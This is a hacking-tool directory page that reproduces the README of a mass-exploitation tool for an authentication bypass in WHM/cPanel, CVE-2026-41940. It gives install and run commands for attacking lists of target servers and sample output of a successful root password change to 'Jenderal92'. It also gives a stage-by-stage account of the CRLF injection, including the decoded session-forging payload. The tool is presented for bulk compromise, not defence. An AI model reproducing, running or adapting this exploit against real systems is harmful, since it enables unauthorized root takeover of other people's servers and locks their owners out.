Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-41940 β€” Bulk scanner and mass exploitation tool for CVE-2026-41940 on cPanel/WHM, built for automated target validation and high-speed multi-threaded execution. | Kitploit
Tools/GitHubGitHub/jenderal92/cve-2026-41940
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlAuthenticationRed TeamingPayload Development
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

Bulk scanner and mass exploitation tool for CVE-2026-41940 on cPanel/WHM, built for automated target validation and high-speed multi-threaded execution.

44264 months agoNot yet reviewed
View Repository

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

CVE-2026-41940 - WHM/cPanel Authentication Bypass Mass Exploit

43153

πŸ“‹ Description

CVE-2026-41940 is a critical authentication bypass vulnerability in WHM/cPanel that allows attackers to bypass authentication and gain root access to a server without valid credentials. The vulnerability leverages CRLF injection in the session handling mechanism to inject malicious session parameters.

This tool provides mass exploitation capabilities with multi-threading support for testing multiple targets simultaneously, featuring intelligent success detection and automatic filtering of invalid targets.


🎯 Main Features

FeatureDescription
βœ… Mass ExploitationScan and exploit multiple targets from a list file
πŸš€ Multi-threadingConfigurable thread count for faster scanning (default: 15)
πŸ” Auto Password ChangeChanges root password to Jenderal92 on successful exploit
πŸ›‘οΈ Smart Success DetectionAutomatically detects various WHM API response formats
⚠️ License Error FilteringExcludes targets with invalid/cannot read license errors
πŸ“ Structured OutputSaves only confirmed successes in `domain:port
πŸ›‘οΈ SSL/TLS SupportHandles self-signed certificates automatically
πŸ”„ Session ManagementAutomatic session extraction, cookie injection, and token handling
⏱️ Timeout ControlConfigurable connection timeout (default: 15 seconds)
πŸ” Pre-connection CheckVerifies port availability before exploitation attempt
πŸ“Š Real-time ProgressShows detailed progress for each exploitation stage

πŸ“¦ Requirements

  • Python 2.7 (required - NOT compatible with Python 3.x)
  • Internet connection for target access
  • Required Python packages:
pip install requests urllib3 futures

Or use requirements.txt:

requests==2.27.1
urllib3==1.26.18
futures==3.4.0

πŸ“₯ Installation

# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Install dependencies
pip install -r requirements.txt

# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py

πŸš€ Usage

1. Prepare Target File

Create a targets.txt file with one target per line:

https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

Note: Port 2087 is the default WHM port. If not specified, it will automatically use port 2087. HTTP/HTTPS prefix will be added automatically if missing.

2. Run the Exploit

Basic Usage (Default Settings)

python2 CVE-2026-41940.py targets.txt

Multi-threaded Usage

# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5

# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20

Custom Hostname

# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

Custom Timeout

# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

πŸ“Š Command Line Arguments

ArgumentDescriptionDefaultRequired
list_fileFile containing target list (one per line)-βœ… Yes
--threadsNumber of concurrent threads15❌ No
--hostnameOverride Host header for all targetsAuto-discover❌ No
--timeoutConnection timeout in seconds15❌ No

πŸ“ Output Format

Result File (res.txt)

Only confirmed successful exploits are saved. Targets with license errors, failed password changes, or connection issues are automatically excluded.

Format:

domain:port|root|Jenderal92

Example output:

www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

Excluded Scenarios

The following targets will NOT be saved to res.txt:

  • License errors (Cannot Read License File)
  • Failed password changes
  • Connection timeouts or refusals
  • Patched/targets without WHM
  • Incorrect credentials or session failures

Console Output

$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] βœ“ Root password successfully changed to 'Jenderal92'!

[βœ“] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  βœ“ 127.0.0.1:2087

πŸ”¬ How the Exploit Works

The exploit consists of 4 main stages with intelligent verification:

Stage 1: Pre-authentication Session

[1] minting a preauth session...
  • Sends a POST request to /login/?login_only=1 with invalid credentials
  • Retrieves the whostmgrsession cookie from the server response
  • Extracts the session base by removing tail ,<obhex> portion
  • This gives us a valid session format to work with

Stage 2: CRLF Injection Attack

[2] sending the CRLF injection...
  • Sends a GET request with Authorization: Basic header containing malicious payload
  • The Base64 payload decodes into:
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • The CRLF (\r\n) characters inject fake session parameters
  • This tricks the server into thinking authentication was successful
  • Server responds with HTTP 307 and a Location header containing the cp_security_token

Stage 3: Session Propagation

[3] firing do_token_denied to propagate...
  • Accesses /scripts2/listaccts endpoint with the manipulated cookie
  • Triggers do_token_denied mechanism in WHM
  • This propagates the injected session parameters into the server's session cache
  • HTTP 401 response with "Token denied" confirms successful propagation
Download Tool